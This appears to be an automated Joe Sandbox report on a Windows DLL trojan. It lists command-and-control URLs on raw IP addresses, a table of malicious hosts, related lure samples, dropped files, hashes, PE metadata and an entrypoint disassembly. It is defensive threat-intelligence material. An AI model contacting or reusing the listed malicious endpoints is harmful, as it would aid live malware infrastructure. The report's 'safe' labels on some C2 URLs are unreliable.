                          https://disneyplus.com/legal.svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://119.193.124.41/regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://217.182.25.250/regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://92.240.254.110/regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://help.disneyplus.com.svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://70.36.102.35/Defaultregsvr32.exe, 00000006.00000003.552388525.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://119.193.124.41:7080/yNzUEhYRmfobVpbnIjDAnFfZFoBrGzwALuEiEPbVregsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          217.182.25.250
                          		unknownFrance
                          		16276OVHFRtrue
                          70.36.102.35
                          		unknownUnited States
                          		22439PERFECT-INTERNATIONALUStrue
                          120.4.0.0
                          		unknownChina
                          		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
                          17.181.2.0
                          		unknownUnited States
                          		714APPLE-ENGINEERINGUSfalse
                          200.220.252.2
                          		unknownBrazil
                          		26599TELEFONICABRASILSABRtrue
                          168.18.251.2
                          		unknownUnited States
                          		3479PEACHNET-AS1UStrue
                          48.13.251.2
                          		unknownUnited States
                          		2686ATGS-MMD-ASUStrue
                          120.16.251.2
                          		unknownAustralia
                          		133612VODAFONE-AS-APVodafoneAustraliaPtyLtdAUtrue
                          23.181.2.0
                          		unknownReserved
                          		23473PAVLOVMEDIAUStrue
                          192.153.248.2
                          		unknownUnited States
                          		2562TI-USINTLUStrue
                          252.180.2.0
                          		unknownReserved
                          		unknownunknowntrue
                          128.63.180.0
                          		unknownUnited States
                          		13DNIC-AS-00013UStrue
                          1.255.0.0
                          		unknownKorea Republic of
                          		9318SKB-ASSKBroadbandCoLtdKRtrue
                          136.31.0.0
                          		unknownUnited States
                          		19165WEBPASSUStrue
                          32.17.251.2
                          		unknownUnited States
                          		2686ATGS-MMD-ASUStrue
                          65.83.89.67
                          		unknownUnited States
                          		6389BELLSOUTH-NET-BLKUStrue
                          64.56.248.2
                          		unknownCanada
                          		6407PRIMUS-AS6407CAtrue
                          224.18.251.2
                          		unknownReserved
                          		unknownunknowntrue
                          96.15.251.2
                          		unknownUnited States
                          		22394CELLCOUStrue
                          51.91.76.89
                          		unknownFrance
                          		16276OVHFRtrue
                          212.253.246.49
                          		unknownTurkey
                          		34984TELLCOM-ASTRtrue
                          171.213.29.176
                          		unknownChina
                          		4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                          248.153.248.2
                          		unknownReserved
                          		unknownunknowntrue
                          14.181.2.0
                          		unknownViet Nam
                          		45899VNPT-AS-VNVNPTCorpVNtrue
                          144.42.251.111
                          		unknownUnited States
                          		27402IBC-N1UStrue
                          72.67.111.110
                          		unknownUnited States
                          		5650FRONTIER-FRTRUStrue
                          26.189.253.2
                          		unknownUnited States
                          		7922COMCAST-7922UStrue
                          96.234.0.0
                          		unknownUnited States
                          		701UUNETUStrue
                          119.193.124.41
                          		unknownKorea Republic of
                          		4766KIXS-AS-KRKoreaTelecomKRtrue
                          92.240.254.110
                          		unknownSlovakia (SLOVAK Republic)
                          		42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue
                          176.200.250.2
                          		unknownItaly
                          		16232ASN-TIMServiceProviderITtrue

                          Private

                          IP
                          192.168.2.1
                          192.168.2.5
                          10.181.2.0
                          127.0.0.1

                          General Information

                          Joe Sandbox Version:35.0.0 Citrine
                          Analysis ID:669375
                          Start date and time: 20/07/202201:10:392022-07-20 01:10:39 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 11m 15s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:xhOJLzQSe7 (renamed file extension from none to dll)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:23
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winDLL@17/5@0/35
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 100% (good quality ratio 95.5%)
                          • Quality average: 76.8%
                          • Quality standard deviation: 29.3%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 25
                          • Number of non-executed functions: 227
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Override analysis time to 240s for rundll32

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:12:21API Interceptor11x Sleep call for process: svchost.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          217.182.25.2509818t9ks1s.dllGet hashmaliciousBrowse
                            uVPWqAOMKn.dllGet hashmaliciousBrowse
                              CUfsVUDkr6.dllGet hashmaliciousBrowse
                                psIFSn7VLi.dllGet hashmaliciousBrowse
                                  dhtylrVZ5y.dllGet hashmaliciousBrowse
                                    oAqFuoJ9ql.dllGet hashmaliciousBrowse
                                      MtsZNCJvMI.dllGet hashmaliciousBrowse
                                        ktrkyRZyaU.dllGet hashmaliciousBrowse
                                          l2sFDHB0lp.dllGet hashmaliciousBrowse
                                            h3CGwIXKW7.dllGet hashmaliciousBrowse
                                              FC6cLk6kKz.dllGet hashmaliciousBrowse
                                                ViiTOVGM74.dllGet hashmaliciousBrowse
                                                  0xnQJ1y1YE.dllGet hashmaliciousBrowse
                                                    ntn3NlNh90.dllGet hashmaliciousBrowse
                                                      8u6naZBcZi.dllGet hashmaliciousBrowse
                                                        z0zJ7pAKCQ.dllGet hashmaliciousBrowse
                                                          6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                                            form.xlsmGet hashmaliciousBrowse
                                                              f5f5.dllGet hashmaliciousBrowse
                                                                4c96.dllGet hashmaliciousBrowse
                                                                  70.36.102.359818t9ks1s.dllGet hashmaliciousBrowse
                                                                    CUfsVUDkr6.dllGet hashmaliciousBrowse
                                                                      l2sFDHB0lp.dllGet hashmaliciousBrowse
                                                                        FC6cLk6kKz.dllGet hashmaliciousBrowse
                                                                          ViiTOVGM74.dllGet hashmaliciousBrowse
                                                                            8u6naZBcZi.dllGet hashmaliciousBrowse
                                                                              6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                                                                gf.dllGet hashmaliciousBrowse
                                                                                  Invoice for payment.xlsGet hashmaliciousBrowse
                                                                                    Fattura N 0000990-19 XNC 25-03-2022.xlsGet hashmaliciousBrowse
                                                                                      Form - 25 Mar, 2022.xlsGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Exploit.Siggen3.30219.2186.xlsGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Exploit.Siggen3.30219.22117.xlsGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Exploit.Siggen3.30235.10947.xlsGet hashmaliciousBrowse
                                                                                              KC2RlIDWzDqQF.dllGet hashmaliciousBrowse
                                                                                                2022-03-25_1048.xlsGet hashmaliciousBrowse
                                                                                                  91ISD Wire Transfer.xlsGet hashmaliciousBrowse
                                                                                                    form_1.xlsGet hashmaliciousBrowse
                                                                                                      imedpub.com_1.xlsGet hashmaliciousBrowse
                                                                                                        imedpub.com.xlsGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          OVHFRbscHLGMyjW.dllGet hashmaliciousBrowse
                                                                                                          • 192.99.251.50
                                                                                                          9818t9ks1s.dllGet hashmaliciousBrowse
                                                                                                          • 192.99.251.50
                                                                                                          uVPWqAOMKn.dllGet hashmaliciousBrowse
                                                                                                          • 146.59.226.45
                                                                                                          CUfsVUDkr6.dllGet hashmaliciousBrowse
                                                                                                          • 51.91.76.89
                                                                                                          psIFSn7VLi.dllGet hashmaliciousBrowse
                                                                                                          • 192.99.251.50
                                                                                                          mtOre6QlR1.exeGet hashmaliciousBrowse
                                                                                                          • 51.255.34.118
                                                                                                          LtVtlK0cd0.exeGet hashmaliciousBrowse
                                                                                                          • 37.59.226.102
                                                                                                          VJjbjkQBMt_bin.jsGet hashmaliciousBrowse
                                                                                                          • 178.32.27.188
                                                                                                          https://awin1.com/cread.php?awinmid=12045&awinaffid=&ued=&clickref=td1_adid:TWSales&p=http%3A%2F%2Fnoxdirect.web.app%2Fkdix07xvardQ3bd0TR3wH05nZ1Get hashmaliciousBrowse
                                                                                                          • 139.99.6.158
                                                                                                          DOC104.docGet hashmaliciousBrowse
                                                                                                          • 54.38.217.40
                                                                                                          fax10545.htmGet hashmaliciousBrowse
                                                                                                          • 51.210.32.132
                                                                                                          JUSTIFICANTE DE PAGO.exeGet hashmaliciousBrowse
                                                                                                          • 92.222.97.132
                                                                                                          Adventstiden.exeGet hashmaliciousBrowse
                                                                                                          • 37.59.226.102
                                                                                                          what_is_in_a_supplier_agreement.jsGet hashmaliciousBrowse
                                                                                                          • 188.165.135.193
                                                                                                          SecuriteInfo.com.Variant.Doina.40672.15982.exeGet hashmaliciousBrowse
                                                                                                          • 51.210.113.204
                                                                                                          Kalkene174.exeGet hashmaliciousBrowse
                                                                                                          • 37.59.226.102
                                                                                                          H29Sj5e4FT.exeGet hashmaliciousBrowse
                                                                                                          • 94.23.190.57
                                                                                                          axnCDWrZKu.exeGet hashmaliciousBrowse
                                                                                                          • 94.23.190.57
                                                                                                          mM83aORZzI.exeGet hashmaliciousBrowse
                                                                                                          • 94.23.190.57
                                                                                                          http://globall.be/cli/ms.html?email=test@tset.comGet hashmaliciousBrowse
                                                                                                          • 213.186.33.104
                                                                                                          PERFECT-INTERNATIONALUS9818t9ks1s.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          CUfsVUDkr6.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          MV MASTER.exeGet hashmaliciousBrowse
                                                                                                          • 64.56.72.187
                                                                                                          FedEx Receipt.exeGet hashmaliciousBrowse
                                                                                                          • 64.56.72.187
                                                                                                          JP181222006.exeGet hashmaliciousBrowse
                                                                                                          • 64.56.72.187
                                                                                                          l2sFDHB0lp.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          FC6cLk6kKz.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          ViiTOVGM74.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          8u6naZBcZi.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          d3h7bNvm1yGet hashmaliciousBrowse
                                                                                                          • 70.36.114.104
                                                                                                          gf.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          Invoice for payment.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          Fattura N 0000990-19 XNC 25-03-2022.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          Form - 25 Mar, 2022.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.30219.2186.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.30219.22117.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.30235.10947.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          KC2RlIDWzDqQF.dllGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35
                                                                                                          2022-03-25_1048.xlsGet hashmaliciousBrowse
                                                                                                          • 70.36.102.35

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8192
                                                                                                          Entropy (8bit):0.3593198815979092
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                          MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                          SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                          SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                          SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                          Malicious:false
                                                                                                          Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:MPEG-4 LOAS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1310720
                                                                                                          Entropy (8bit):0.2494769775041721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4F:BJiRdwfu2SRU4F
                                                                                                          MD5:88071C3BD9E3CC34C8D9AFDE14ED3CB4
                                                                                                          SHA1:5E3FD9ADA509777A7D0275615540533DD58B7C73
                                                                                                          SHA-256:F9C9F1C1C50DC3BF0C899BC591278DE1C0E35B3BFB8B60C0043F2517A37F2E20
                                                                                                          SHA-512:C9DF93D5652744D560196B93E1A6731E27912A33CE17A5F1201A1BA6390F2EF5BB84087B6C9C227475D0296A6CF398FEAD390A076708EB446A2A5B2F0524C63A
                                                                                                          Malicious:false
                                                                                                          Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc5b2aade, page size 16384, Windows version 10.0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):786432
                                                                                                          Entropy (8bit):0.2506485651556909
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Q75+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:Q7SSB2nSB2RSjlK/+mLesOj1J2
                                                                                                          MD5:A9F772B36D7B60A4F8AE685217B8B990
                                                                                                          SHA1:39EDA4A6E9D0983CBCE64B6461BAB392D836D23A
                                                                                                          SHA-256:51123EBF547311EA6563ECCF8E6F5BEECAB06BEDF7B98F85C4DDD51A991C33DC
                                                                                                          SHA-512:02D38075F3C561202B9FF22BA5DC303DF1265F8114311CB88FFFF5B52CCF0429921A0191FA90B786E533C97F757017A2C9DE9F3D6A379F08C8FBACA4F322B548
                                                                                                          Malicious:false
                                                                                                          Preview:...... ................e.f.3...w........................)..........zo......z..h.(..........zo...)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................(H......zo.................rF%......zo.........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16384
                                                                                                          Entropy (8bit):0.07701541276467044
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:fS7vwKeh7WkE/vbWlXvF5l//Uwikf8/all3Vkttlmlnl:6rwFAzWlXTt80fZ3
                                                                                                          MD5:49858689703A1D91AC87C7D09DD56D04
                                                                                                          SHA1:C97DCE7C9AACE737EB1A83A686C02864F6B394BA
                                                                                                          SHA-256:2908DC01BF0447C5861A039D5BDC4BE8C6BC1D4296C0E7A8F56D33DCDAC80EEB
                                                                                                          SHA-512:BE25C0D1654B22692BE3F5C5CC3CB16DFAB696F73F2C6C31C9D8FFBEF88E31D738F09B8F265F14C2CEFC9AA9A5720565C8656D3C5727006B9FBBF7CC36F6BF00
                                                                                                          Malicious:false
                                                                                                          Preview:.>.I.....................................3...w.......z;......zo..............zo......zo.y........z.g................rF%......zo.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55
                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                          Malicious:false
                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.416849040145407
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:xhOJLzQSe7.dll
                                                                                                          File size:626688
                                                                                                          MD5:2408e1b795944eabc7f184c634b0ed81
                                                                                                          SHA1:01f644589eebee027396cc2bc925c07f1dfbd573
                                                                                                          SHA256:81875fefda81b8cfa1ab74dfac14d608d01c2cd9f94abb232e2c6c91a63b3682
                                                                                                          SHA512:d3a2909078d6f7b8624e049b17b2ee21b038ae242a7ed4e50222567ca1cf36eb4e72d5f354d2fc8a3ce2642307246a6ea2d04c10b889c1b1fba4d99ce9aa582d
                                                                                                          SSDEEP:6144:XvRov7wREVy3B6yu4YXep2v5uYxlNmsgrR8drCSi78SLUYeDrQ0Ax+xSEN:ZsVyXu4YupcuYVmxrSsmD8fx+xJ
                                                                                                          TLSH:E7D46C117691C832FC995F34359392BD1FF87F64AAA4822BEF903A4D6BB35008E146D7
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7...d...d...d+..d...d+..d...d...d...d.!.d...d.!.d`..d.!.dv..d.!.d...d.!.d...d.!.d...dRich...d................PE..L...p.<b...

                                                                                                          File Icon

                                                                                                          Icon Hash:71b018ccc6577131

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x100209c7
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x10000000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x623C8770 [Thu Mar 24 15:00:00 2022 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:196752bd65f33bc6f5dd0426f39259ae

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          cmp dword ptr [esp+08h], 01h
                                                                                                          jne 00007FBA0CD80087h
                                                                                                          call 00007FBA0CD8758Ah
                                                                                                          push dword ptr [esp+04h]
                                                                                                          mov ecx, dword ptr [esp+10h]
                                                                                                          mov edx, dword ptr [esp+0Ch]
                                                                                                          call 00007FBA0CD7FF72h
                                                                                                          pop ecx
                                                                                                          retn 000Ch
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          sub esp, 20h
                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000008h
                                                                                                          pop ecx
                                                                                                          mov esi, 100397B4h
                                                                                                          lea edi, dword ptr [ebp-20h]
                                                                                                          rep movsd
                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                          mov eax, dword ptr [ebp+0Ch]
                                                                                                          test eax, eax
                                                                                                          pop edi
                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                          pop esi
                                                                                                          je 00007FBA0CD8008Eh
                                                                                                          test byte ptr [eax], 00000008h
                                                                                                          je 00007FBA0CD80089h
                                                                                                          mov dword ptr [ebp-0Ch], 01994000h
                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                          push eax
                                                                                                          push dword ptr [ebp-10h]
                                                                                                          push dword ptr [ebp-1Ch]
                                                                                                          push dword ptr [ebp-20h]
                                                                                                          call dword ptr [100360E0h]
                                                                                                          leave
                                                                                                          retn 0008h
                                                                                                          push 00000000h
                                                                                                          push dword ptr [esp+14h]
                                                                                                          push dword ptr [esp+14h]
                                                                                                          push dword ptr [esp+14h]
                                                                                                          push dword ptr [esp+14h]
                                                                                                          call 00007FBA0CD87659h
                                                                                                          add esp, 14h
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                          test ecx, 00000003h
                                                                                                          je 00007FBA0CD800A6h
                                                                                                          mov al, byte ptr [ecx]
                                                                                                          add ecx, 01h
                                                                                                          test al, al
                                                                                                          je 00007FBA0CD800D0h
                                                                                                          test ecx, 00000003h
                                                                                                          jne 00007FBA0CD80071h
                                                                                                          add eax, 00000000h
                                                                                                          lea esp, dword ptr [esp+00000000h]
                                                                                                          lea esp, dword ptr [esp+00000000h]
                                                                                                          mov eax, dword ptr [ecx]
                                                                                                          mov edx, 7EFEFEFFh
                                                                                                          add edx, eax
                                                                                                          xor eax, FFFFFFFFh
                                                                                                          xor eax, edx

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [ASM] VS2005 build 50727
                                                                                                          • [ C ] VS2005 build 50727
                                                                                                          • [C++] VS2005 build 50727
                                                                                                          • [EXP] VS2005 build 50727
                                                                                                          • [RES] VS2005 build 50727
                                                                                                          • [LNK] VS2005 build 50727

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x434c00x54.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x419140xdc.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x480b4.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000x3fe8.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3b9a00x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x360000x53c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4188c0x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x340f70x35000False0.5665859006485849data6.63826832292909IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x360000xd5140xe000False0.31638881138392855data4.886223825499972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x440000x65980x3000False0.2610677083333333data4.030187754909099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x4b0000x480b40x49000False0.5451626712328768data6.348672990248238IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x940000x86600x9000False0.3055284288194444data3.8230472463394145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          0x4c0740x20800dataSpanishMexico
                                                                                                          RT_CURSOR0x6c8740x134data
                                                                                                          RT_CURSOR0x6c9a80xb4data
                                                                                                          RT_CURSOR0x6ca5c0x134AmigaOS bitmap font
                                                                                                          RT_CURSOR0x6cb900x134data
                                                                                                          RT_CURSOR0x6ccc40x134data
                                                                                                          RT_CURSOR0x6cdf80x134data
                                                                                                          RT_CURSOR0x6cf2c0x134data
                                                                                                          RT_CURSOR0x6d0600x134data
                                                                                                          RT_CURSOR0x6d1940x134data
                                                                                                          RT_CURSOR0x6d2c80x134data
                                                                                                          RT_CURSOR0x6d3fc0x134data
                                                                                                          RT_CURSOR0x6d5300x134data
                                                                                                          RT_CURSOR0x6d6640x134AmigaOS bitmap font
                                                                                                          RT_CURSOR0x6d7980x134data
                                                                                                          RT_CURSOR0x6d8cc0x134data
